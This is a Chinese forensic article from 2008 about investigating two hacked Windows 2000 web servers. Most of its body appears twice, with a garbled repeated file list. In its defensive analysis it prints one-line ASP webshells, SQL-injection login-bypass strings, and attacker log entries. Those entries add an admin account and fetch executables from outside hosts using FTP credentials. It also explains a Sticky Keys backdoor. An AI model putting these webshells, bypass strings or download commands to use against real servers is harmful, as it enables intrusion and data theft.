駭客基地 閱讀:
<script src="http://www.hookbase.com/design/GetHits.asp?ArticleID=15773" language="javascript" type="text/javascript"></script>
1 時間:2008-3-28 8:05:45 來源:www.hookbase.com
【51CTO.com 專家特稿】隨着信息技術的發展,越來越多的人都喜歡用計算機辦公,發郵件,建設自己的個人站點,公司建立自己的企業站點,政府也逐漸的採取了網上辦公,更 好的爲人民服務,銀行和證券機構也都開始依託互聯網來進行金融和股票交易,但是隨着方便的同時也同時帶來了新的一些計算機網絡安全隱患,隨着司法機關的介 入,我相信在不久的將來,網絡攻擊調查取證也會成爲立法機構必須要考慮設立的一門新的學科,目前來說開設這個的課程多在網絡警察和一些特殊機關,現在我來 給大家講下我親身經歷並參與完成的一次取證過程,用事實來講述;
我一直從事病毒分析,網絡攻擊響應相關的工作,這次應好朋友的邀請,幫忙配合去協 查幾臺服務器,我們來到了某XXX駐地,首先進行例行檢查。經過了 1天左右的時間的檢查,其中用到了一些專用設備也包含自主編寫的工具以及第三方提供的勘察取證軟件,共發現問題主機服務器10臺,其中2臺比較嚴重,(以 下用A服務器和B服務器來代替)和朋友商定後,決定帶回我們的實驗室,進行專項深入分析。
習慣的檢查步驟操作:
服務器操作系統版本信息——>操作系統補丁安裝情況——>操作系統安裝時間,中間有沒有經過進行重新安裝——>服務器維護情況——>服務器上面安裝的軟件版本信息
日誌檢查——IDS日誌信息/IIS日誌信息/系統日誌信息
網站代碼審查——是否存在一句話木馬,源代碼上是否存在惡意代碼插入
殺毒軟件版本更新情況——是否是最新版本,配置的是否合理,配套的監視是否全部打開
數據恢復——>利用專用數據恢復軟件進行數據恢復,恢復一些被刪除的日誌信息和系統信息,曾經安裝過的文件操作信息。
提取可疑文件(病毒、木馬、後門、惡意廣告插件)——在系統文件目錄利用第三方或者自開發軟件,對可疑文件進行提取並進行深度分析。
上述步驟是我個人總結的,有不妥的地方還請朋友們指正,介紹完理論,我們來實踐處理下這兩臺服務器。
A服務器檢查處理過程
該A服務器所裝的操作系統是Advanced 2000 server,服務器上安裝的有瑞星2008殺毒軟件,病毒庫已經更新到最新版本。但是並沒有安裝網絡防火牆和其他系統監視軟件,安裝的ftp服務器版本爲server-u 6.0(存在溢出攻擊的威脅)
一 對原始數據進行恢復
利 用Datarecover軟件來恢復一些被刪除的文件,目的是希望從被刪除的文件來找出一些木馬或者後門以及病毒。進行深度分析,把曾經做過的格式化,以 及在回收站中刪除過的文件恢復過來,但是遺憾的是成功拿下這臺服務器權限的黑客已經做了專業處理,把他的一些痕跡進行了全面清理,個人認爲他使用了日本地 下黑客組織開發的專項日誌清除工具,經過我和助手的共同努力還是把系統日誌恢復到當年5月份。
二 手工分析可疑文件
在本服務器的c盤根目 錄下面有一個sethc..exe 文件。這個文件是微軟自帶的,是系統粘制鍵,真實的大小應爲27kb,而這個文件爲270kb,起初我以爲是由於打補丁的原因。但是經過翻閱一些資料和做 比對之後,才知道這樣的文件是一個新開發的流行後門,主要用法:通過3389終端,然後通過5次敲擊shift鍵,直接調用sethc.exe而直接取得 系統權限。隨後達到控制整個服務器,通常他還是通過刪除正常的一些c盤exe文件。然後把自己僞造成那個所刪除的exe文件名。造成一種假象。
這裏我們提供解決方法如下:個人建議這個功能實用性並不高,建議直接刪除這個文件,如果有人利用這個手法來對你的服務器進行入侵,那就肯定是有人做了手腳,可以第一時間發現黑客入侵行爲,也可以作爲取證分析的一個思路;在控制面板的輔助功能裏面設置取消粘制鍵。
三、 利用專用防火牆檢查工具去查看網絡連接情況
目的是通過抓數據包來找出問題。如果對方安裝的有遠程控制終端,他肯定需要讓保存在服務器上的後門和控制終端進行通話,會有一個會話連接。通過防火牆的攔截功能而去尋找出控制的源頭。這個上面沒有發現存在反彈木馬,所以沒有看到入侵的源頭。
四、檢查系統日誌
作用:檢查系統日誌是否被入侵者清除,如果日誌被入侵者刪除,需要用數據恢復軟件恢復操作系統日誌
檢查內容:主要包括IIS日誌,安全性日誌,系統日誌。
更近一步深入檢查:
找到日誌後,仔細分析網站是否有入侵者留下的webshell,尤其是一句話後門
根據Webshell的名字, 在IIS 訪問日誌裏搜索相關的名字,找到入侵者常用的ip地址,分析ip地址
還可以根據此IP地址檢索IIS日誌中,此入侵者都進行過什麼樣的操作
技術點滴:如果你比較熟悉Webshell,通過Get操作可以知道入侵者都進行過何種操作。因爲Get操作是被系統記錄的。
如果入侵者裝有系統級的後門,用常用工具比如冰刃(IceSword),System Repair Engineer (SREng)等分析出可疑文件,用其他調試工具分析找到入侵者控制端IP地址。
通過服務器日誌查出隱藏在後面的幕後黑客
通 過iis的log訪問日誌,排查出三個可疑目標,其中一個手法相對於後兩個入侵者更熟練一些,他在今年5月份左右或者更早就拿到了該服務器權限,上來之後 到是沒有做任何的添加和修改,從技術上來看,他是通過尋找網站的注入點進來的,然後在上面放了不少的後門,還放了一個mm.exe的文件,但是因爲技術問 題,沒有把這個馬運行起來,從外部訪問只是在主頁上顯示爲mm.jpeg,僞裝成了圖片。但是打開以後,什麼都沒有。經過我們分析以後,它是一張裸女的 jpeg文件。如果他這個mm.exe成功,完全有可能將該主站頁面換成一張黃色圖片。危害還是有的。另外該站點權限給的過高,在訪問新聞頻道的時候,直 接就是sa權限。這個是最高系統級和Admin是一個級別的。
由於服務器被網管人員重新裝過,初步懷疑是用的ghost安裝的,造成了原珍貴日誌數據無法找回,我們只能分析出7月份-12月份這段時間的日誌,通過這些日誌我們又發現了針對此站點的入侵記錄。
入侵者操作再現:(黑客入侵操作過程分析)
2007-07-15 14:51:53 61.184.107.206 添加管理用戶 net localgroup administrator Cao$ /add
2007-07-15 15:08:56 61.184.107.206 寫下載exe的vbs腳本 c:/admin.vbs 試圖下載exe地址爲:http://www.dianqiji.com/pic/2007/0428/admin.exe
2007-08-12 09:48:45 218.205.238.6 寫入webshell小馬:d:/ybcenter/gg3.asp shell裏留的QQ:183037,之後此人頻繁用此後門登陸服務器
2007-08-25 08:03:15 218.28.24.118 曾訪問他以前留下的操作數據庫的webshell /system/unit/main.asp 此後門可以瀏覽到敏感數據庫的信息
2007-08-25 08:12:45 218.28.24.118 寫入另一個webshell D:/ybcenter/ggsm.asp
之後,218.28.24.118用以前留下的功能比較全的webshell /Cnnsc.asp和/system/unit/Cnnsc.asp頻繁操作服務器上文件
2007-11-11 14:23:23 218.28.24.118 用他曾經留下的操作數據庫的後門/service/asp.asp訪問敏感數據庫的信息
2007-08-25 08:27:57 218.28.24.118 用他曾經留下的操作數據庫的後門/system/unit/sql.asp訪問敏感數據庫的信息
2007-11-11 11:02:55 218.28.24.118 試圖訪問他曾經留下的操作數據庫的後門/yb/in_main3.asp訪問敏感數據庫
2007-08-06 12:42:41 218.19.22.152 寫下載腳本C:/down.vbs 下載的exe爲http://ray8701.3322.org/1.exe
2007-08-09 11:57:16 218.19.98.147 寫ftp下載exe的腳本c:/zxq.txt ftp服務器203.253.31.244 用戶名kick1000 密碼84460965 下載1.exe
2007-08-26 07:43:47 123.5.57.117 試圖攻擊服務器
2007-08-26 07:43:47 123.5.57.117 寫ftp下載exe的腳本c:/zxq.txt ftp服務器203.253.31.244 用戶名kick1000 密碼84460965 下載1.exe
2007-12-10 12:41:34 123.52.18.141 檢測注入
五、查看登陸信息 查看是否存在有克隆帳戶。
方法:檢查註冊表裏面的sam文件有沒有相同的fv,在這裏檢查過程中沒有發現存在有克隆帳號。
六、查看系統安裝日誌,在這裏並未發現問題。
七、 查看IIS訪問日誌,在這裏發現了攻擊者信息。
2007-12-01 08:55:16 220.175.79.231 檢測注入
2007-12-03 18:40:48 218.28.68.126 檢測注入
2007-12-04 01:31:32 218.28.192.90 檢測注入,掃描web目錄
2007-12-04 23:23:33 221.5.55.76 檢測注入
2007-12-05 09:20:57 222.182.140.71 檢測注入
2007-12-08 09:39:53 218.28.220.154 檢測注入
2007-12-08 21:31:44 123.5.197.40 檢測注入
2007-12-09 05:32:14 218.28.246.10 檢測注入
2007-12-09 08:47:43 218.28.192.90 檢測注入
2007-12-09 16:50:39 61.178.89.229 檢測注入
2007-12-10 05:50:24 58.54.98.40 檢測注入
定位可疑IP地址,追蹤來源 查出IP地址的信息。
八、查看網站首頁的源代碼,在iframe 這個位置查看是否有不屬於該網站的網站信息。(查找 網馬的方法),以及如何發現一些潛在的木馬和網絡可利用漏洞。
下面是我們得到的一些他的網馬。
備份一句話木馬 <%eval(request("a"):response.end%>
注射檢查,在IIS裏面查找是否存在的有針對 %20 and 1=1’sql
'or'='or' a'or'1=1-- ,'or1=1-- ,"or1=1-- ,or1=1--, 'or'a'='a, "or"="a'='a等
作用:躲避驗證信息 主要用在後臺登陸上
%5c 爆數據庫,作用直接下載服務器上的數據庫,獲得用戶名和密碼,經過系統提權而拿到整個服務器權限。
針對一些下載者這樣的木馬,主要需要在windows /document and setting下面的local setting 的 temp 或者 temp internet的這個文件夾中查看剛生成的exe文件,重點查看一下在system32文件夾下面的exe文件,尤其關注最新生成的exe文件,僞造的 系統文件等。
以上就是針對A服務器的整個檢查過程以及發現問題後該如何處理和補救的相關解決方法。
B服務器檢查取證分析
B服務器裝的是windows2000 server版本,操作步驟同上。
經過一段細心的檢查還是讓我和助手們發現了一個木馬,起因是在網站源代碼處發現都被插入了一些奇怪的代碼,在system32系統文件夾下還發現了新的niu.exe,非常可疑,提取該exe文件,在虛擬機中進行分析,得出該exe工作原理:
該exe 屬木馬類,病毒運行後判斷當前運行文件的文件路徑如果不是%System32%/SVCH0ST.EXE,將打開當前文件的所在目錄複製自身到% System32%下,更名爲SVSH0ST.EXE,並衍生autorun.inf文件;複製自身到所有驅動器根目錄下,更名爲niu.exe,並衍生 autorun.inf文件,實現雙擊打開驅動器時,自動運行病毒文件;遍歷所有驅動器,在htm、asp、aspx、php、html、jsp格式文件 的尾部插入96個字節的病毒代碼;遍歷磁盤刪除以GHO爲擴展名的文件,使用戶無法進行系統還原;連接網絡下載病毒文件;修改系統時間爲2000 年;病毒運行後刪除自身。
以上是我配合有關部門參與的真實的一次的取證記錄,因爲答應過朋友要保守祕密,所以真實的一些ip地址和信息這裏都做保留。同時在這裏我要感謝安天cert組的戰友的幫忙,以及身邊的2個助手的並肩作戰。
我一直從事病毒分析,網絡攻擊響應相關的工作,這次應好朋友的邀請,幫忙配合去協 查幾臺服務器,我們來到了某XXX駐地,首先進行例行檢查。經過了 1天左右的時間的檢查,其中用到了一些專用設備也包含自主編寫的工具以及第三方提供的勘察取證軟件,共發現問題主機服務器10臺,其中2臺比較嚴重,(以 下用A服務器和B服務器來代替)和朋友商定後,決定帶回我們的實驗室,進行專項深入分析。
習慣的檢查步驟操作:
服務器操作系統版本信息——>操作系統補丁安裝情況——>操作系統安裝時間,中間有沒有經過進行重新安裝——>服務器維護情況——>服務器上面安裝的軟件版本信息
日誌檢查——IDS日誌信息/IIS日誌信息/系統日誌信息
網站代碼審查——是否存在一句話木馬,源代碼上是否存在惡意代碼插入
殺毒軟件版本更新情況——是否是最新版本,配置的是否合理,配套的監視是否全部打開
數據恢復——>利用專用數據恢復軟件進行數據恢復,恢復一些被刪除的日誌信息和系統信息,曾經安裝過的文件操作信息。
提取可疑文件(病毒、木馬、後門、惡意廣告插件)——在系統文件目錄利用第三方或者自開發軟件,對可疑文件進行提取並進行深度分析。
上述步驟是我個人總結的,有不妥的地方還請朋友們指正,介紹完理論,我們來實踐處理下這兩臺服務器。
A服務器檢查處理過程
該A服務器所裝的操作系統是Advanced 2000 server,服務器上安裝的有瑞星2008殺毒軟件,病毒庫已經更新到最新版本。但是並沒有安裝網絡防火牆和其他系統監視軟件,安裝的ftp服務器版本爲server-u 6.0(存在溢出攻擊的威脅)
一 對原始數據進行恢復
利 用Datarecover軟件來恢復一些被刪除的文件,目的是希望從被刪除的文件來找出一些木馬或者後門以及病毒。進行深度分析,把曾經做過的格式化,以 及在回收站中刪除過的文件恢復過來,但是遺憾的是成功拿下這臺服務器權限的黑客已經做了專業處理,把他的一些痕跡進行了全面清理,個人認爲他使用了日本地 下黑客組織開發的專項日誌清除工具,經過我和助手的共同努力還是把系統日誌恢復到當年5月份。
二 手工分析可疑文件
在本服務器的c盤根目 錄下面有一個sethc..exe 文件。這個文件是微軟自帶的,是系統粘制鍵,真實的大小應爲27kb,而這個文件爲270kb,起初我以爲是由於打補丁的原因。但是經過翻閱一些資料和做 比對之後,才知道這樣的文件是一個新開發的流行後門,主要用法:通過3389終端,然後通過5次敲擊shift鍵,直接調用sethc.exe而直接取得 系統權限。隨後達到控制整個服務器,通常他還是通過刪除正常的一些c盤exe文件。然後把自己僞造成那個所刪除的exe文件名。造成一種假象。
這裏我們提供解決方法如下:個人建議這個功能實用性並不高,建議直接刪除這個文件,如果有人利用這個手法來對你的服務器進行入侵,那就肯定是有人做了手腳,可以第一時間發現黑客入侵行爲,也可以作爲取證分析的一個思路;在控制面板的輔助功能裏面設置取消粘制鍵。
三、 利用專用防火牆檢查工具去查看網絡連接情況
目的是通過抓數據包來找出問題。如果對方安裝的有遠程控制終端,他肯定需要讓保存在服務器上的後門和控制終端進行通話,會有一個會話連接。通過防火牆的攔截功能而去尋找出控制的源頭。這個上面沒有發現存在反彈木馬,所以沒有看到入侵的源頭。
四、檢查系統日誌
作用:檢查系統日誌是否被入侵者清除,如果日誌被入侵者刪除,需要用數據恢復軟件恢復操作系統日誌
檢查內容:主要包括IIS日誌,安全性日誌,系統日誌。
更近一步深入檢查:
找到日誌後,仔細分析網站是否有入侵者留下的webshell,尤其是一句話後門
根據Webshell的名字, 在IIS 訪問日誌裏搜索相關的名字,找到入侵者常用的ip地址,分析ip地址
還可以根據此IP地址檢索IIS日誌中,此入侵者都進行過什麼樣的操作
技術點滴:如果你比較熟悉Webshell,通過Get操作可以知道入侵者都進行過何種操作。因爲Get操作是被系統記錄的。
如果入侵者裝有系統級的後門,用常用工具比如冰刃(IceSword),System Repair Engineer (SREng)等分析出可疑文件,用其他調試工具分析找到入侵者控制端IP地址。
通過服務器日誌查出隱藏在後面的幕後黑客
通 過iis的log訪問日誌,排查出三個可疑目標,其中一個手法相對於後兩個入侵者更熟練一些,他在今年5月份左右或者更早就拿到了該服務器權限,上來之後 到是沒有做任何的添加和修改,從技術上來看,他是通過尋找網站的注入點進來的,然後在上面放了不少的後門,還放了一個mm.exe的文件,但是因爲技術問 題,沒有把這個馬運行起來,從外部訪問只是在主頁上顯示爲mm.jpeg,僞裝成了圖片。但是打開以後,什麼都沒有。經過我們分析以後,它是一張裸女的 jpeg文件。如果他這個mm.exe成功,完全有可能將該主站頁面換成一張黃色圖片。危害還是有的。另外該站點權限給的過高,在訪問新聞頻道的時候,直 接就是sa權限。這個是最高系統級和Admin是一個級別的。
由於服務器被網管人員重新裝過,初步懷疑是用的ghost安裝的,造成了原珍貴日誌數據無法找回,我們只能分析出7月份-12月份這段時間的日誌,通過這些日誌我們又發現了針對此站點的入侵記錄。
入侵者操作再現:(黑客入侵操作過程分析)
2007-07-15 14:51:53 61.184.107.206 添加管理用戶 net localgroup administrator Cao$ /add
2007-07-15 15:08:56 61.184.107.206 寫下載exe的vbs腳本 c:/admin.vbs 試圖下載exe地址爲:http://www.dianqiji.com/pic/2007/0428/admin.exe
2007-08-12 09:48:45 218.205.238.6 寫入webshell小馬:d:/ybcenter/gg3.asp shell裏留的QQ:183037,之後此人頻繁用此後門登陸服務器
2007-08-25 08:03:15 218.28.24.118 曾訪問他以前留下的操作數據庫的webshell /system/unit/main.asp 此後門可以瀏覽到敏感數據庫的信息
2007-08-25 08:12:45 218.28.24.118 寫入另一個webshell D:/ybcenter/ggsm.asp
之後,218.28.24.118用以前留下的功能比較全的webshell /Cnnsc.asp和/system/unit/Cnnsc.asp頻繁操作服務器上文件
2007-11-11 14:23:23 218.28.24.118 用他曾經留下的操作數據庫的後門/service/asp.asp訪問敏感數據庫的信息
2007-08-25 08:27:57 218.28.24.118 用他曾經留下的操作數據庫的後門/system/unit/sql.asp訪問敏感數據庫的信息
2007-11-11 11:02:55 218.28.24.118 試圖訪問他曾經留下的操作數據庫的後門/yb/in_main3.asp訪問敏感數據庫
2007-08-06 12:42:41 218.19.22.152 寫下載腳本C:/down.vbs 下載的exe爲http://ray8701.3322.org/1.exe
2007-08-09 11:57:16 218.19.98.147 寫ftp下載exe的腳本c:/zxq.txt ftp服務器203.253.31.244 用戶名kick1000 密碼84460965 下載1.exe
2007-08-26 07:43:47 123.5.57.117 試圖攻擊服務器
2007-08-26 07:43:47 123.5.57.117 寫ftp下載exe的腳本c:/zxq.txt ftp服務器203.253.31.244 用戶名kick1000 密碼84460965 下載1.exe
2007-12-10 12:41:34 123.52.18.141 檢測注入
五、查看登陸信息 查看是否存在有克隆帳戶。
方法:檢查註冊表裏面的sam文件有沒有相同的fv,在這裏檢查過程中沒有發現存在有克隆帳號。
六、查看系統安裝日誌,在這裏並未發現問題。
七、 查看IIS訪問日誌,在這裏發現了攻擊者信息。
2007-12-01 08:55:16 220.175.79.231 檢測注入
2007-12-03 18:40:48 218.28.68.126 檢測注入
2007-12-04 01:31:32 218.28.192.90 檢測注入,掃描web目錄
2007-12-04 23:23:33 221.5.55.76 檢測注入
2007-12-05 09:20:57 222.182.140.71 檢測注入
2007-12-08 09:39:53 218.28.220.154 檢測注入
2007-12-08 21:31:44 123.5.197.40 檢測注入
2007-12-09 05:32:14 218.28.246.10 檢測注入
2007-12-09 08:47:43 218.28.192.90 檢測注入
2007-12-09 16:50:39 61.178.89.229 檢測注入
2007-12-10 05:50:24 58.54.98.40 檢測注入
定位可疑IP地址,追蹤來源 查出IP地址的信息。
八、查看網站首頁的源代碼,在iframe 這個位置查看是否有不屬於該網站的網站信息。(查找 網馬的方法),以及如何發現一些潛在的木馬和網絡可利用漏洞。
下面是我們得到的一些他的網馬。
gg3.asp Q:183637
log.asp
pigpot.asp
webdown.vbs
attach/a.gif
attach/chongtian.gif
attach/111.rar
system/unit/yjh.asp
system/unit/conn.asp 加入防注入
Q:6242889678
images/mm.jpg = exe自解壓 主頁包含文件
一句話木馬:<%execute request %>log.asp
pigpot.asp
webdown.vbs
attach/a.gif
attach/chongtian.gif
attach/111.rar
system/unit/yjh.asp
system/unit/conn.asp 加入防注入
Q:6242889678
images/mm.jpg = exe自解壓 主頁包含文件
備份一句話木馬 <%eval(request("a"):response.end%>
注射檢查,在IIS裏面查找是否存在的有針對 %20 and 1=1’sql
'or'='or' a'or'1=1-- ,'or1=1-- ,"or1=1-- ,or1=1--, 'or'a'='a, "or"="a'='a等
作用:躲避驗證信息 主要用在後臺登陸上
%5c 爆數據庫,作用直接下載服務器上的數據庫,獲得用戶名和密碼,經過系統提權而拿到整個服務器權限。
針對一些下載者這樣的木馬,主要需要在windows /document and setting下面的local setting 的 temp 或者 temp internet的這個文件夾中查看剛生成的exe文件,重點查看一下在system32文件夾下面的exe文件,尤其關注最新生成的exe文件,僞造的 系統文件等。
以上就是針對A服務器的整個檢查過程以及發現問題後該如何處理和補救的相關解決方法。
B服務器檢查取證分析
B服務器裝的是windows2000 server版本,操作步驟同上。
經過一段細心的檢查還是讓我和助手們發現了一個木馬,起因是在網站源代碼處發現都被插入了一些奇怪的代碼,在system32系統文件夾下還發現了新的niu.exe,非常可疑,提取該exe文件,在虛擬機中進行分析,得出該exe工作原理:
該exe 屬木馬類,病毒運行後判斷當前運行文件的文件路徑如果不是%System32%/SVCH0ST.EXE,將打開當前文件的所在目錄複製自身到% System32%下,更名爲SVSH0ST.EXE,並衍生autorun.inf文件;複製自身到所有驅動器根目錄下,更名爲niu.exe,並衍生 autorun.inf文件,實現雙擊打開驅動器時,自動運行病毒文件;遍歷所有驅動器,在htm、asp、aspx、php、html、jsp格式文件 的尾部插入96個字節的病毒代碼;遍歷磁盤刪除以GHO爲擴展名的文件,使用戶無法進行系統還原;連接網絡下載病毒文件;修改系統時間爲2000 年;病毒運行後刪除自身。
以上是我配合有關部門參與的真實的一次的取證記錄,因爲答應過朋友要保守祕密,所以真實的一些ip地址和信息這裏都做保留。同時在這裏我要感謝安天cert組的戰友的幫忙,以及身邊的2個助手的並肩作戰。